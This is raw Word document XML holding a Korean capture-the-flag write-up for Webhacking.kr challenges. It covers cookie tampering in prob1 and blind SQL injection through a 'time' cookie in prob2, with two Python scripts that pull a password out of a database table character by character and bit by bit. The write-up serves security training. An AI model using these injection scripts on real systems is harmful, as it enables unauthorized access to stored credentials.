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C7F" w:rsidRDefault="00DB1207" w:rsidP="00DB1207">
      <w:pPr>
        <w:pStyle w:val="a3"/>
      </w:pPr>
      <w:r>
        <w:t>Webhacking.kr Write-up</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00DB1207" w:rsidRDefault="00DB1207" w:rsidP="00DB1207">
      <w:pPr>
        <w:jc w:val="right"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>B</w:t>
      </w:r>
      <w:r>
        <w:t>oB7</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve">기 취약점분석 </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>정성조</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
    </w:p>
    <w:p w:rsidR="00DB1207" w:rsidRPr="000A15A9" w:rsidRDefault="00B641FC" w:rsidP="00B641FC">
      <w:pPr>
        <w:pStyle w:val="1"/>
        <w:rPr>
          <w:rStyle w:val="a6"/>
          <w:sz w:val="40"/>
          <w:szCs w:val="40"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="000A15A9">
        <w:rPr>
          <w:rStyle w:val="a6"/>
          <w:sz w:val="40"/>
          <w:szCs w:val="40"/>
        </w:rPr>
        <w:t>prob1</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00B641FC" w:rsidRDefault="00B641FC" w:rsidP="00DB1207">
      <w:pPr>
        <w:ind w:right="800"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:noProof/>
        </w:rPr>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="0EBC76E2" wp14:editId="3864EAF4">
            <wp:extent cx="4105275" cy="4914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C" w:rsidRDefault="00B641FC" w:rsidP="00DB1207">
      <w:pPr>
        <w:ind w:right="800"/>
      </w:pPr>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:t>user_lv</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>쿠키의 값이</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> 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사이의 숫자로 시작하거나,</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve">6이상이면 </w:t>
      </w:r>
      <w:r>
        <w:t>1</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve">로 </w:t>
      </w:r>
      <w:r>
        <w:t>se</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>t된다.</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00B641FC" w:rsidRDefault="00B641FC" w:rsidP="00DB1207">
      <w:pPr>
        <w:ind w:right="800"/>
      </w:pPr>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>u</w:t>
      </w:r>
      <w:r>
        <w:t>ser_lv</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve">쿠키의 값이 </w:t>
      </w:r>
      <w:r>
        <w:t>5</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>보다 크면 문제가 풀린다.</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00B641FC" w:rsidRDefault="00B641FC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74505A89" wp14:editId="283C7E49">
            <wp:extent cx="5731510" cy="23983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C" w:rsidRDefault="00B641FC" w:rsidP="00DB1207">
      <w:pPr>
        <w:ind w:right="800"/>
      </w:pPr>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:t>user_lv</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>을 5</w:t>
      </w:r>
      <w:r>
        <w:t>.5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>하면 문제를 풀 수 있다.</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00B641FC" w:rsidRPr="000A15A9" w:rsidRDefault="00B641FC" w:rsidP="00B641FC">
      <w:pPr>
        <w:pStyle w:val="1"/>
        <w:rPr>
          <w:rStyle w:val="a6"/>
          <w:sz w:val="40"/>
          <w:szCs w:val="40"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="000A15A9">
        <w:rPr>
          <w:rStyle w:val="a6"/>
          <w:sz w:val="40"/>
          <w:szCs w:val="40"/>
        </w:rPr>
        <w:lastRenderedPageBreak/>
        <w:t>prob2</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00B641FC" w:rsidRDefault="00B641FC" w:rsidP="00DB1207">
      <w:pPr>
        <w:ind w:right="800"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:noProof/>
        </w:rPr>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="0CE20E99" wp14:editId="13391992">
            <wp:extent cx="5731510" cy="54127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967E95" w:rsidP="00DB1207">
      <w:pPr>
        <w:ind w:right="800"/>
        <w:rPr>
          <w:noProof/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>눈에 띄는 것은 주석과 m</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">ap </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>태그 정도이다.</w:t>
      </w:r>
      <w:r w:rsidR="00F45BCE" w:rsidRPr="00F45BCE">
        <w:rPr>
          <w:noProof/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00B641FC" w:rsidRDefault="00F45BCE" w:rsidP="00DB1207">
      <w:pPr>
        <w:ind w:right="800"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:noProof/>
        </w:rPr>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="3037077E" wp14:editId="50689A74">
            <wp:extent cx="5731510" cy="15227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>B</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">oard </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve">게시판에서 </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>비밀글을</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve"> 찾을 수 있다.</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00F45BCE" w:rsidRDefault="00F45BCE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310A316E" wp14:editId="2B9507FC">
            <wp:extent cx="2352675" cy="1495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 xml:space="preserve">용의 머리를 클릭하면 숨겨져 있는 </w:t>
      </w:r>
      <w:r>
        <w:t>admin page</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>를 찾을 수 있다.</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00F45BCE" w:rsidRDefault="00F45BCE" w:rsidP="00DB1207">
      <w:pPr>
        <w:ind w:right="800"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:noProof/>
        </w:rPr>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="3F470B37" wp14:editId="1AF44B1D">
            <wp:extent cx="5286375" cy="4010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쿠키가 존재하는 것을 볼 수 있다.</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00F45BCE" w:rsidRDefault="00F45BCE" w:rsidP="00DB1207">
      <w:pPr>
        <w:ind w:right="800"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve">주석으로 시간에 대한 정보가 </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>쓰여있는데</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve"> t</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">ime </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>쿠키값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일단 두 가지를 </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>연관지어</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve"> 생각해보았다.</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00F45BCE" w:rsidRDefault="00F45BCE" w:rsidP="00DB1207">
      <w:pPr>
        <w:ind w:right="800"/>
      </w:pP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값은 p</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">hp </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>함수를 써서 나온 값으로 보</w:t>
      </w:r>
      <w:r w:rsidR="005F7541">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>인다.</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="005F7541" w:rsidRDefault="005F7541" w:rsidP="005F7541">
      <w:pPr>
        <w:pStyle w:val="1"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">time = </w:t>
      </w:r>
      <w:r w:rsidRPr="005F7541">
        <w:t>1532780804 and 0</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="005F7541" w:rsidRDefault="005F7541" w:rsidP="00DB1207">
      <w:pPr>
        <w:ind w:right="800"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:noProof/>
        </w:rPr>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="796E9129" wp14:editId="4A2559BE">
            <wp:extent cx="2066925" cy="561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41" w:rsidRDefault="005F7541" w:rsidP="005F7541">
      <w:pPr>
        <w:pStyle w:val="1"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:lastRenderedPageBreak/>
        <w:t>t</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">ime = </w:t>
      </w:r>
      <w:r w:rsidRPr="005F7541">
        <w:t>1532780804 and 1</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="005F7541" w:rsidRDefault="005F7541" w:rsidP="00DB1207">
      <w:pPr>
        <w:ind w:right="800"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:noProof/>
        </w:rPr>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="3482EF62" wp14:editId="45169355">
            <wp:extent cx="2009775" cy="3524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41" w:rsidRDefault="005F7541" w:rsidP="00DB1207">
      <w:pPr>
        <w:ind w:right="800"/>
      </w:pPr>
      <w:r>
        <w:t>2070</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>-</w:t>
      </w:r>
      <w:r>
        <w:t>01-01 09:00:00</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve">이 </w:t>
      </w:r>
      <w:r w:rsidR="001E585B">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>거짓일 때,</w:t>
      </w:r>
      <w:r w:rsidR="001E585B">
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>2</w:t>
      </w:r>
      <w:r>
        <w:t>070-01-01 09:00:01</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve">이 </w:t>
      </w:r>
      <w:r w:rsidR="001E585B">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>참일 때로 보인다.</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="001E585B" w:rsidRDefault="001E585B" w:rsidP="00DB1207">
      <w:pPr>
        <w:ind w:right="800"/>
      </w:pPr>
      <w:r w:rsidRPr="000A15A9">
        <w:rPr>
          <w:b/>
        </w:rPr>
        <w:t xml:space="preserve">select </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="000A15A9">
        <w:rPr>
          <w:b/>
        </w:rPr>
        <w:t>from_unixtime</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="000A15A9">
        <w:rPr>
          <w:b/>
        </w:rPr>
        <w:t>(1532780804)</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>형태로 작동하는 것으로 생각할 수 있다.</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="001E585B" w:rsidRDefault="001E585B" w:rsidP="00DB1207">
      <w:pPr>
        <w:ind w:right="800"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:noProof/>
        </w:rPr>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="1A88834B" wp14:editId="3E7F9F74">
            <wp:extent cx="5476875" cy="4781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5B" w:rsidRDefault="001E585B" w:rsidP="00DB1207">
      <w:pPr>
        <w:ind w:right="800"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve">왜 </w:t>
      </w:r>
      <w:r>
        <w:t>2070</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve">년이 나오는지는 </w:t>
      </w:r>
      <w:proofErr w:type="gramStart"/>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>의문이다.</w:t>
      </w:r>
      <w:r>
        <w:t>.</w:t>
      </w:r>
      <w:proofErr w:type="gramEnd"/>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve"> 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9</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve">시를 </w:t>
      </w:r>
      <w:r>
        <w:t>default</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>로 알고 있었는데 d</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">efault </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>값을 바꿀 수도 있나 보다.</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="001E585B" w:rsidRDefault="00145BAE" w:rsidP="00DB1207">
      <w:pPr>
        <w:ind w:right="800"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:noProof/>
        </w:rPr>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="31237AB8" wp14:editId="07FDDF45">
            <wp:extent cx="5731510" cy="10458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AE" w:rsidRDefault="00145BAE" w:rsidP="00DB1207">
      <w:pPr>
        <w:ind w:right="800"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve">테이블 이름은 </w:t>
      </w:r>
      <w:r>
        <w:t>FreeB0aRd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게싱하였다</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>.</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00145BAE" w:rsidRPr="00145BAE" w:rsidRDefault="00145BAE" w:rsidP="00145BAE">
      <w:pPr>
        <w:ind w:right="800"/>
        <w:jc w:val="center"/>
        <w:rPr>
          <w:b/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00145BAE">
        <w:rPr>
          <w:b/>
        </w:rPr>
        <w:lastRenderedPageBreak/>
        <w:t>1532780804 and (select length(password) from FreeB0</w:t>
      </w:r>
      <w:proofErr w:type="gramStart"/>
      <w:r w:rsidRPr="00145BAE">
        <w:rPr>
          <w:b/>
        </w:rPr>
        <w:t>aRd)=</w:t>
      </w:r>
      <w:proofErr w:type="gramEnd"/>
      <w:r w:rsidRPr="00145BAE">
        <w:rPr>
          <w:b/>
        </w:rPr>
        <w:t>9</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00145BAE" w:rsidRDefault="00652817" w:rsidP="00DB1207">
      <w:pPr>
        <w:ind w:righ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2235</wp:posOffset>
                </wp:positionV>
                <wp:extent cx="5705475" cy="6898640"/>
                <wp:effectExtent l="0" t="0" r="28575" b="165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9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1C" w:rsidRDefault="007B061C" w:rsidP="00652817">
                            <w:r>
                              <w:t>import urllib2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url = 'http://webhacking.kr/challenge/web/web-02/index.php'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result = ''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for i in range(1, 10):</w:t>
                            </w:r>
                          </w:p>
                          <w:p w:rsidR="007B061C" w:rsidRDefault="007B061C" w:rsidP="00652817">
                            <w:r>
                              <w:t xml:space="preserve">    print('cracking... [{}]'.format(i))</w:t>
                            </w:r>
                          </w:p>
                          <w:p w:rsidR="007B061C" w:rsidRDefault="007B061C" w:rsidP="00652817">
                            <w:r>
                              <w:t xml:space="preserve">    for j in range(ord('!'), ord('z')+1):</w:t>
                            </w:r>
                          </w:p>
                          <w:p w:rsidR="007B061C" w:rsidRDefault="007B061C" w:rsidP="00652817">
                            <w:r>
                              <w:t xml:space="preserve">        header = {'Cookie': 'time=1532780804 and (select ord(substr(password, '+str(i)+', 1)) from FreeB0aRd)='+str(j)+'; PHPSESSID=bb5c626601193b1eb4ee5de882a44a8b'}</w:t>
                            </w:r>
                          </w:p>
                          <w:p w:rsidR="007B061C" w:rsidRDefault="007B061C" w:rsidP="00652817">
                            <w:r>
                              <w:t xml:space="preserve">        req = urllib2.Request(url, headers = header)</w:t>
                            </w:r>
                          </w:p>
                          <w:p w:rsidR="007B061C" w:rsidRDefault="007B061C" w:rsidP="00652817">
                            <w:r>
                              <w:t xml:space="preserve">        </w:t>
                            </w:r>
                          </w:p>
                          <w:p w:rsidR="007B061C" w:rsidRDefault="007B061C" w:rsidP="00652817">
                            <w:r>
                              <w:t xml:space="preserve">        data = urllib2.urlopen(req).read()</w:t>
                            </w:r>
                          </w:p>
                          <w:p w:rsidR="007B061C" w:rsidRDefault="007B061C" w:rsidP="00652817">
                            <w:r>
                              <w:t xml:space="preserve">        </w:t>
                            </w:r>
                          </w:p>
                          <w:p w:rsidR="007B061C" w:rsidRDefault="007B061C" w:rsidP="00652817">
                            <w:r>
                              <w:t xml:space="preserve">        if '&lt;!--2070-01-01 09:00:01--&gt;' in data:</w:t>
                            </w:r>
                          </w:p>
                          <w:p w:rsidR="007B061C" w:rsidRDefault="007B061C" w:rsidP="00652817">
                            <w:r>
                              <w:t xml:space="preserve">            result += chr(j);</w:t>
                            </w:r>
                          </w:p>
                          <w:p w:rsidR="007B061C" w:rsidRDefault="007B061C" w:rsidP="00652817">
                            <w:r>
                              <w:t xml:space="preserve">            print(result)</w:t>
                            </w:r>
                          </w:p>
                          <w:p w:rsidR="007B061C" w:rsidRDefault="007B061C" w:rsidP="00652817">
                            <w:r>
                              <w:t xml:space="preserve">    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108.05pt;width:449.25pt;height:54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">
                <v:textbox>
                  <w:txbxContent>
                    <w:p w:rsidR="007B061C" w:rsidRDefault="007B061C" w:rsidP="00652817">
                      <w:r>
                        <w:t>import urllib2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url = 'http://webhacking.kr/challenge/web/web-02/index.php'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result = ''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for i in range(1, 10):</w:t>
                      </w:r>
                    </w:p>
                    <w:p w:rsidR="007B061C" w:rsidRDefault="007B061C" w:rsidP="00652817">
                      <w:r>
                        <w:t xml:space="preserve">    print('cracking... [{}]'.format(i))</w:t>
                      </w:r>
                    </w:p>
                    <w:p w:rsidR="007B061C" w:rsidRDefault="007B061C" w:rsidP="00652817">
                      <w:r>
                        <w:t xml:space="preserve">    for j in range(ord('!'), ord('z')+1):</w:t>
                      </w:r>
                    </w:p>
                    <w:p w:rsidR="007B061C" w:rsidRDefault="007B061C" w:rsidP="00652817">
                      <w:r>
                        <w:t xml:space="preserve">        header = {'Cookie': 'time=1532780804 and (select ord(substr(password, '+str(i)+', 1)) from FreeB0aRd)='+str(j)+'; PHPSESSID=bb5c626601193b1eb4ee5de882a44a8b'}</w:t>
                      </w:r>
                    </w:p>
                    <w:p w:rsidR="007B061C" w:rsidRDefault="007B061C" w:rsidP="00652817">
                      <w:r>
                        <w:t xml:space="preserve">        req = urllib2.Request(url, headers = header)</w:t>
                      </w:r>
                    </w:p>
                    <w:p w:rsidR="007B061C" w:rsidRDefault="007B061C" w:rsidP="00652817">
                      <w:r>
                        <w:t xml:space="preserve">        </w:t>
                      </w:r>
                    </w:p>
                    <w:p w:rsidR="007B061C" w:rsidRDefault="007B061C" w:rsidP="00652817">
                      <w:r>
                        <w:t xml:space="preserve">        data = urllib2.urlopen(req).read()</w:t>
                      </w:r>
                    </w:p>
                    <w:p w:rsidR="007B061C" w:rsidRDefault="007B061C" w:rsidP="00652817">
                      <w:r>
                        <w:t xml:space="preserve">        </w:t>
                      </w:r>
                    </w:p>
                    <w:p w:rsidR="007B061C" w:rsidRDefault="007B061C" w:rsidP="00652817">
                      <w:r>
                        <w:t xml:space="preserve">        if '&lt;!--2070-01-01 09:00:01--&gt;' in data:</w:t>
                      </w:r>
                    </w:p>
                    <w:p w:rsidR="007B061C" w:rsidRDefault="007B061C" w:rsidP="00652817">
                      <w:r>
                        <w:t xml:space="preserve">            result += chr(j);</w:t>
                      </w:r>
                    </w:p>
                    <w:p w:rsidR="007B061C" w:rsidRDefault="007B061C" w:rsidP="00652817">
                      <w:r>
                        <w:t xml:space="preserve">            print(result)</w:t>
                      </w:r>
                    </w:p>
                    <w:p w:rsidR="007B061C" w:rsidRDefault="007B061C" w:rsidP="00652817">
                      <w:r>
                        <w:t xml:space="preserve">            break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BAE">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>p</w:t>
      </w:r>
      <w:r w:rsidR="00145BAE">
        <w:t xml:space="preserve">assword </w:t>
      </w:r>
      <w:r w:rsidR="00145BAE">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>컬럼의 길이는 9로 추정할 수 있다.</w:t>
      </w:r>
      <w:r w:rsidR="00145BAE">
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r w:rsidR="00145BAE">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>게시글이 더 많았다면 i</w:t>
      </w:r>
      <w:r w:rsidR="00145BAE">
        <w:t xml:space="preserve">d </w:t>
      </w:r>
      <w:r w:rsidR="00145BAE">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>조건을 주면 될 것이다.</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00652817" w:rsidRDefault="00652817" w:rsidP="00DB1207">
      <w:pPr>
        <w:ind w:right="800"/>
      </w:pPr>
    </w:p>
    <w:p w:rsidR="00652817" w:rsidRDefault="00652817" w:rsidP="00DB1207">
      <w:pPr>
        <w:ind w:right="800"/>
        <w:rPr>
          <w:rStyle w:val="a4"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00652817">
        <w:rPr>
          <w:rStyle w:val="a4"/>
        </w:rPr>
        <w:t>prob2.py</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00652817" w:rsidRDefault="00652817" w:rsidP="00DB1207">
      <w:pPr>
        <w:ind w:right="800"/>
        <w:rPr>
          <w:rStyle w:val="a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012EC3" wp14:editId="3D6BE753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705475" cy="6898640"/>
                <wp:effectExtent l="0" t="0" r="28575" b="1651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9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1C" w:rsidRDefault="007B061C" w:rsidP="00652817">
                            <w:r>
                              <w:t>import urllib2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url = 'http://webhacking.kr/challenge/web/web-02/index.php'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result = ''</w:t>
                            </w:r>
                          </w:p>
                          <w:p w:rsidR="007B061C" w:rsidRDefault="007B061C" w:rsidP="00652817"/>
                          <w:p w:rsidR="007B061C" w:rsidRDefault="007B061C" w:rsidP="00652817">
                            <w:r>
                              <w:t>for i in range(1, 10):</w:t>
                            </w:r>
                          </w:p>
                          <w:p w:rsidR="007B061C" w:rsidRDefault="007B061C" w:rsidP="00652817">
                            <w:r>
                              <w:t xml:space="preserve">    print('cracking... [{}]'.format(i))</w:t>
                            </w:r>
                          </w:p>
                          <w:p w:rsidR="007B061C" w:rsidRDefault="007B061C" w:rsidP="00652817">
                            <w:r>
                              <w:t xml:space="preserve">    tmp = 0</w:t>
                            </w:r>
                          </w:p>
                          <w:p w:rsidR="007B061C" w:rsidRDefault="007B061C" w:rsidP="00652817">
                            <w:r>
                              <w:t xml:space="preserve">    for j in range(1, 8):</w:t>
                            </w:r>
                          </w:p>
                          <w:p w:rsidR="007B061C" w:rsidRDefault="007B061C" w:rsidP="00652817">
                            <w:r>
                              <w:t xml:space="preserve">        header = {'Cookie': 'time=1532780804 and (select substr(lpad(bin(ord(substr(password, '+str(i)+', 1))), 7, 0), '+str(j)+', 1) from FreeB0aRd)=1; PHPSESSID=bb5c626601193b1eb4ee5de882a44a8b'}</w:t>
                            </w:r>
                          </w:p>
                          <w:p w:rsidR="007B061C" w:rsidRDefault="007B061C" w:rsidP="00652817">
                            <w:r>
                              <w:t xml:space="preserve">        req = urllib2.Request(url, headers = header)</w:t>
                            </w:r>
                          </w:p>
                          <w:p w:rsidR="007B061C" w:rsidRDefault="007B061C" w:rsidP="00652817">
                            <w:r>
                              <w:t xml:space="preserve">        </w:t>
                            </w:r>
                          </w:p>
                          <w:p w:rsidR="007B061C" w:rsidRDefault="007B061C" w:rsidP="00652817">
                            <w:r>
                              <w:t xml:space="preserve">        data = urllib2.urlopen(req).read()</w:t>
                            </w:r>
                          </w:p>
                          <w:p w:rsidR="007B061C" w:rsidRDefault="007B061C" w:rsidP="00652817">
                            <w:r>
                              <w:t xml:space="preserve">        if '&lt;!--2070-01-01 09:00:01--&gt;' in data:</w:t>
                            </w:r>
                          </w:p>
                          <w:p w:rsidR="007B061C" w:rsidRDefault="007B061C" w:rsidP="00652817">
                            <w:r>
                              <w:t xml:space="preserve">            tmp += pow(2, 7-j)</w:t>
                            </w:r>
                          </w:p>
                          <w:p w:rsidR="007B061C" w:rsidRDefault="007B061C" w:rsidP="00652817">
                            <w:r>
                              <w:t xml:space="preserve">        if j == 7:</w:t>
                            </w:r>
                          </w:p>
                          <w:p w:rsidR="007B061C" w:rsidRDefault="007B061C" w:rsidP="00652817">
                            <w:r>
                              <w:t xml:space="preserve">            result += chr(tmp)</w:t>
                            </w:r>
                          </w:p>
                          <w:p w:rsidR="007B061C" w:rsidRDefault="007B061C" w:rsidP="00652817">
                            <w:r>
                              <w:t xml:space="preserve">            print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2EC3" id="_x0000_s1027" type="#_x0000_t202" style="position:absolute;left:0;text-align:left;margin-left:398.05pt;margin-top:26.85pt;width:449.25pt;height:543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">
                <v:textbox>
                  <w:txbxContent>
                    <w:p w:rsidR="007B061C" w:rsidRDefault="007B061C" w:rsidP="00652817">
                      <w:r>
                        <w:t>import urllib2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url = 'http://webhacking.kr/challenge/web/web-02/index.php'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result = ''</w:t>
                      </w:r>
                    </w:p>
                    <w:p w:rsidR="007B061C" w:rsidRDefault="007B061C" w:rsidP="00652817"/>
                    <w:p w:rsidR="007B061C" w:rsidRDefault="007B061C" w:rsidP="00652817">
                      <w:r>
                        <w:t>for i in range(1, 10):</w:t>
                      </w:r>
                    </w:p>
                    <w:p w:rsidR="007B061C" w:rsidRDefault="007B061C" w:rsidP="00652817">
                      <w:r>
                        <w:t xml:space="preserve">    print('cracking... [{}]'.format(i))</w:t>
                      </w:r>
                    </w:p>
                    <w:p w:rsidR="007B061C" w:rsidRDefault="007B061C" w:rsidP="00652817">
                      <w:r>
                        <w:t xml:space="preserve">    tmp = 0</w:t>
                      </w:r>
                    </w:p>
